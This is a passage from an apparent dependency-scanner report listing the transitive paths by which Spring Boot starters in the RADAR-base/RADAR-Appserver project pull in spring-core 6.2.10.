Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
